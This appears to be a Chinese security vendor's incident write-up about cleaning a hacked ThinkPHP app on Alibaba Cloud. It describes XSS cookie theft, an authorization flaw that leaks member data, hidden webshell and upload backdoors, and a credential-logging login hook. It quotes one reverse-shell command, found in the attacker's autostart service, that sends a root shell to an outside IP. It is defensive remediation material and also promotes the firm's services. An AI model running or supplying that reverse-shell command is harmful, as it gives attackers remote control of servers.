當(dāng)前位置:首頁 >  科技 >  IT業(yè)界 >  正文

網(wǎng)站被黑導(dǎo)致阿里云異常流量及異常網(wǎng)絡(luò)連接的安全解決過程

 2022-09-01 10:28  來源: A5用戶投稿   我來投稿 撤稿糾錯

  域名預(yù)訂/競價,好“米”不錯過

相信有很多站長以及運(yùn)營網(wǎng)站或APP的技術(shù)人員都有一些安全上的困擾,尤其是對網(wǎng)站代碼里存在后門文件,以及服務(wù)器被植入木馬病毒的安全問題很鬧心,前段時間我們接到客戶的安全咨詢,說是找的第三方開發(fā)公司做的APP和后臺,運(yùn)營了起來差不多3個月,一開始注冊的會員量不是很多,當(dāng)注冊達(dá)到成千上萬個會員注冊量的時候,就相繼出現(xiàn)了安全上的問題,數(shù)據(jù)庫總是被篡改,會員信息泄露,以及被阿里云提示的云安全中心,安全事件提醒,尊敬的*玉:云盾云安全中心檢測到您的服務(wù)器:47.180.*.*(主服務(wù)器)出現(xiàn)了緊急安全事件:自啟動后門,建議您立即進(jìn)行處理。進(jìn)程異常行為-反彈Shell和異常網(wǎng)絡(luò)連接-反彈shell網(wǎng)絡(luò)外連以及惡意腳本代碼執(zhí)行還有Linux可疑命令序列惡意軟件-后門程序等告警,針對這些安全問題,我們來給大家科普一下,如何去除網(wǎng)站后門木馬以及代碼漏洞檢測等問題。

攻擊情況介紹:

當(dāng)天我們收到客戶的電話咨詢,客戶的平臺、APP和H5端、以及后臺遭到黑客入侵,并篡改了數(shù)據(jù)庫里面的數(shù)據(jù),導(dǎo)致平臺的損失過萬,詳細(xì)詢問了客戶的平臺架構(gòu)以及部署的服務(wù)器數(shù)量,發(fā)現(xiàn)客戶用的是Thinkphp架構(gòu)開發(fā),APP的API接口和H5端以及后臺管理都是在該架構(gòu)的基礎(chǔ)上開發(fā)的,因?yàn)檫@套代碼是客戶從買來后找的第三方公司進(jìn)行的二次開發(fā),第三方開發(fā)公司對里面的代碼后門并不清楚,很多低價賣源碼的,肯定是有利益可圖的。建議大家買來后一定要對網(wǎng)站源碼進(jìn)行代碼安全審計和網(wǎng)站后門審計服務(wù),尤其是對準(zhǔn)備剛上線的APP平臺,對安全問題要重視起來,否則到了后期會員規(guī)模上來后,損失的就不止這一點(diǎn)了。

跟客戶進(jìn)行了詳細(xì)的對接,梳理了所有的服務(wù)器的信息以及網(wǎng)站源碼的位置,我們的SINE安全工程師立即將代碼打包到本地,進(jìn)行源代碼安全審計,通過對用戶注冊以及APP里的具體功能代碼,都進(jìn)行了全面的人工漏洞測試,發(fā)現(xiàn)在留言反饋以及會員信息功能,存在XSS跨站漏洞,這個漏洞可以將XSS攻擊代碼植入到后臺里去,當(dāng)后臺的管理人員查看了反饋的留言或用戶的個人詳情,就會直接觸發(fā)該XSS漏洞,XSS漏洞可以獲取到網(wǎng)站后臺的地址,以及管理員的Session和cookies,有了這2個值,黑客就可以登錄后臺了,對APP里的API接口也進(jìn)行詳細(xì)的安全審計,發(fā)現(xiàn)存在會員信息泄露漏洞,由于未對UID值進(jìn)行當(dāng)前賬號權(quán)限判斷,可以越權(quán)查看其它UID的會員信息,像手機(jī)號以及注冊時間,銀行卡,錢包地址,密碼等等的信息,都可以越權(quán)查看,我們SINE安全工程師對代碼中的一些函數(shù)功能代碼進(jìn)行審計,檢測出了源碼作者留的一句話木馬后門,而且還是加密形式免殺webshell,代碼如下:

真是道高一尺魔高一丈,源碼作者留的后門,手段非常高,一般的建站公司技術(shù)是沒辦法看出這個文件是木馬代碼的,我們對其網(wǎng)站的訪問日志以及APP的接口日志進(jìn)行人工檢查,還發(fā)現(xiàn)了后臺登錄這里被黑客動了手腳,只要管理員登錄成功會立即把用戶名和密碼寫到/data/目錄下的robots.txt文件中,建議大家日后做檢查代碼的時候先搜索下_encode關(guān)鍵詞看看有沒有可疑的,以及搜索關(guān)鍵詞eval函數(shù)的都有哪些再調(diào)用,因?yàn)楹芏嘁痪湓捘抉R都是調(diào)用的eval函數(shù),通過對每個代碼的安全審計發(fā)現(xiàn)上傳功能的代碼中存在上傳后門具體代碼如下:

后門真是太多了,防不勝防,辛虧客戶找到了我們SINE安全對網(wǎng)站代碼進(jìn)行了詳細(xì)的安全審計和漏洞測試,我們對網(wǎng)站的上傳的目錄進(jìn)行了腳本執(zhí)行權(quán)限控制,對eval的后門進(jìn)行了強(qiáng)制刪除,以及對管理后臺登錄這里的后門進(jìn)行了修復(fù),對一些XSS跨站攻擊的代碼進(jìn)行了攻擊防護(hù),對所有g(shù)et post變量提交的參數(shù)進(jìn)行了安全過濾,凡是包含xss跨站代碼的,以及非法植入攻擊代碼的都進(jìn)行了攔截過濾,并對整套代碼進(jìn)行了安全加固與防護(hù),也同時對服務(wù)器進(jìn)行了端口安全策略部署和基礎(chǔ)安全設(shè)置,如注冊表權(quán)限,環(huán)境運(yùn)行賬戶權(quán)限,mysql數(shù)據(jù)庫的權(quán)限分離設(shè)置,以及nginx的運(yùn)行賬戶進(jìn)行了設(shè)置,防止通過網(wǎng)站后門木馬進(jìn)行提權(quán)拿到服務(wù)器權(quán)限,如果想要對網(wǎng)站代碼進(jìn)行后門查找和清除和漏洞人工測試服務(wù)的可以向網(wǎng)站漏洞修復(fù)服務(wù)商SINE安全或鷹盾安全以及啟明星辰,大樹安全等這些服務(wù)商尋求技術(shù)支持。針對阿里云的云安全中心安全事件提醒,我們讓客戶提供了阿里云賬號和密碼,登錄后,對該安全事件的詳情進(jìn)行了查看,發(fā)現(xiàn)確實(shí)是黑客植入了自啟動的后門,我們對Linux系統(tǒng)的自啟動服務(wù)進(jìn)行了查看,發(fā)現(xiàn)黑客植入的木馬病毒,每次重啟服務(wù)器都會自動啟動該服務(wù),向外發(fā)送連接請求,Command: bash -i >& / dev/tcp/1.15.235.160/25670>&1 該命令是直接反彈了Linux root SHELL到1.15.235.160黑客的服務(wù)器。我們對該IP進(jìn)行了阿里云安全組IP限制,以及對系統(tǒng)里的自啟動服務(wù)進(jìn)行了刪除與防篡改部署,至此客戶的APP被黑客攻擊以及篡改數(shù)據(jù)的問題得到了徹底的解決。也希望我們的解決過程分享,能幫到更多的人。

申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!

相關(guān)標(biāo)簽
網(wǎng)站被黑
阿里云

相關(guān)文章

  • 近日,一大批網(wǎng)站被黑,我們?nèi)绾螒?yīng)對和解決

    從上周開始,老賀發(fā)現(xiàn)很多兄弟們的網(wǎng)站突然被黑了,包括我們“半壁江山流量匯”中的兄弟。有些發(fā)現(xiàn)快的,還能來得及處理,而有些網(wǎng)站,因?yàn)榘l(fā)現(xiàn)慢,已經(jīng)出現(xiàn)了排名完了,收錄被百度情況的問題!對此,老賀這里做了系統(tǒng)的信息收集,寫出這篇文章:1、被黑的系統(tǒng),本次被黑的系統(tǒng)既有windows系列的,也有l(wèi)inux相

  • 阿里云峰會發(fā)布《Well-Architected云卓越架構(gòu)白皮書》:助力企業(yè)用好云管好云

    6月1日,2023阿里云峰會·粵港澳大灣區(qū)在廣州舉行,會上阿里云正式推出《云卓越架構(gòu)白皮書》,為企業(yè)用云管云解決方案和產(chǎn)品化落地提供指引,助力企業(yè)構(gòu)建更加安全、高效、穩(wěn)定的云架構(gòu)。本書由阿里云架構(gòu)師團(tuán)隊、產(chǎn)品團(tuán)隊、全球交付團(tuán)隊等眾多團(tuán)隊基于過去多年服務(wù)企業(yè)的經(jīng)驗(yàn)總結(jié)共同撰寫,從安全合規(guī)、穩(wěn)定性、成本

    標(biāo)簽:
    阿里云
  • 性價比提升15%,阿里云發(fā)布第八代企業(yè)級計算實(shí)例g8a和性能增強(qiáng)型實(shí)例g8ae

    5月17日,2023阿里云峰會·常州站上,阿里云正式發(fā)布第八代企業(yè)級計算實(shí)例g8a以及性能增強(qiáng)性實(shí)例g8ae。兩款實(shí)例搭載第四代AMDEPYC處理器,標(biāo)配阿里云eRDMA大規(guī)模加速能力,網(wǎng)絡(luò)延時低至8微秒。其中,g8a綜合性價比平均提升15%以上,g8ae算力最高提升55%,在AI推理與訓(xùn)練、深度學(xué)

    標(biāo)簽:
    阿里云
  • 阿里云分拆上市,張勇發(fā)聲了!

    5月18日晚,阿里巴巴集團(tuán)董事會主席兼CEO、阿里云智能集團(tuán)董事長兼CEO張勇向阿里云員工發(fā)出全員信。他表示,阿里云智能計劃在未來12個月將從阿里集團(tuán)完全分拆,并完成上市,在股權(quán)和公司治理上形成一家與阿里集團(tuán)完全獨(dú)立的新公司。同時,阿里云智能集團(tuán)將引入外部戰(zhàn)略投資者。據(jù)阿里巴巴集團(tuán)最新財報,阿里云智

    標(biāo)簽:
    阿里云
  • 阿里云,在AI戰(zhàn)場鳴槍

    文/零度出品/節(jié)點(diǎn)商業(yè)組阿里史上最大一次組織變革后,內(nèi)部傳達(dá)出一個信號:所有業(yè)務(wù),只要干得好,都能獨(dú)立融資上市。一時間,市場眾說紛紜。對于誰將成為當(dāng)前階段阿里體系第一個獨(dú)立上市的項(xiàng)目,大家都在猜測。由張勇帶隊的阿里云,成為市場最關(guān)注的獨(dú)立業(yè)務(wù)線。兩個線索,其一、阿里云已經(jīng)在國內(nèi)云服務(wù)第一的位置上良久

    標(biāo)簽:
    阿里云

熱門排行

信息推薦